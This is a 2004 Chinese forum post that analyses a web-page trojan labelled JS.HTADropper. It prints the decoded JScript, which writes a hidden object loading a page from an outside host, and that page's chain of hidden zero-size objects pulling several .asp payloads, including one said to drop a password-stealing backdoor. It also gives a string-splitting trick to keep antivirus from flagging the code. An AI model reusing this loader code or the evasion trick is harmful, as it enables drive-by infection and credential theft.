返回列表 回复 发帖

骑士

Rank: 2Rank: 2

帖子
790 
积分
1670 
金钱
4360 金币 
贡献
0 点 
包子
0 个 
楼主
打印
tT
孤影发表于 2004-5-24 20:06 | 只看该作者

【共享】JS.HTADropper.k源代码

使用ZWD轻易破解后的明文如下:
<script language="JScript.Encode">
<!--
var Words="%3Cobject data%3D%22http%3A//home.itdrp.com/kevjy/mm.html%22 weight%3D0 width%3D 0%3E%3C/object%3E"
function SetNewWords()
{var NewWords;NewWords=unescape(Words);document.write(NewWords);}
SetNewWords();
// -->
</script>
看见了破解后的明文,可以分析这里是个重点
http%3A//home.itdrp.com/kevjy/mm.html
%3A是编码后的内容,翻译过来就是t。那么我们现在清楚了,原来开始的时候还插入了一个mm.html页!
好!再去这里看看:http://home.itdrp.com/kevjy/mm.html
竟然是张白页?晕……而且无法查看源代码,点了“查看源文件”竟然没反应,连输入view-source都不可以,只好把它强行下载回来研究了。
一下回来竟然被杀毒软件杀掉了,看来这个页面最有问题了。关闭杀毒软件时实监控,再下一次。
OK!现在我们可以看见mm.html的内容如下:
前面的代码是这样的(被杀毒软件认成病毒的就是这里了,后面的无毒就不说了,我懒……):

QUOTE  
<html>
<body>
<object data="lhxyexe.asp" weight=0 width= 0 height="14"></object>
<object data="lhxyhta.asp" weight=0 width= 0 height="14"></object>
<object data="20cn.asp" weight=0 width= 0 height="14"></object>
<object data="qqkev.asp" weight=0 width= 0 height="14"></object>
<object data="lhxyexe1.asp" weight=0 width= 0 height="14"></object>
<object data="lhxyhta1.asp" weight=0 width= 0 height="14"></object>
<object data="i"+"e.asp" weight=0 width= 0 height="14"></object>
</body>
</html>
(以上的代码会被杀毒软件认成病毒,如果想保存此文章,请把上面的代码转换成下面的代码,书写方式变化而已)
<html>
<body>
<object data="lhxy"+"exe.asp" weight=0 width= 0 height="14"></object>
<object data="lhxy"+"hta.asp" weight=0 width= 0 height="14"></object>
<object data="20"+"cn.asp" weight=0 width= 0 height="14"></object>
<object data="qqk"+"ev.asp" weight=0 width= 0 height="14"></object>
<object data="lhx"+"yexe1.asp" weight=0 width= 0 height="14"></object>
<object data="lhxy"+"hta1.asp" weight=0 width= 0 height="14"></object>
<object data="i"+"e.asp" weight=0 width= 0 height="14"></object>
</body>
</html>
可以看见上面的代码就知道问题所在了。经过检查lhxyexe.asp,并未对系统做什么动作。而20cn.asp等都是病毒文件(好狠毒啊)。均为脚本病毒js.htadropper的变种,
JS.HTADropper.b 不详
JS.HTADropper.c 修改用户IE设置的恶意网页
JS.HTADropper.d 恶意网页的恶意脚本
JS.HTADropper.e 启动后是放出两个脚本病毒,具体放出了谁我就不清楚了,等待有识之士一起研究
JS.HTADropper.f 恶意网站释放的病毒。利用IE漏洞,释放木马病毒Trojan.PSW.PS-Client.enc,
JS.HTADropper.gen 脚本病毒,作用不详。
现在来说说刚才JS.HTADropper.f放出来的小木马吧。
Trojan.PSW.PS-Client.enc其实是个后门程序,在后台隐藏运行。并修改注册表的 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 项,在其中添加一项 键值以达到自启动的目的.窃取用户密码。
真是无“毒”不丈夫啊!!
小生佩服佩服……以上就是对网页木马的简单剖析,如有什么不对,还请高手斧正。
收藏 分享 评分
回复 引用

订阅 TOP

返回列表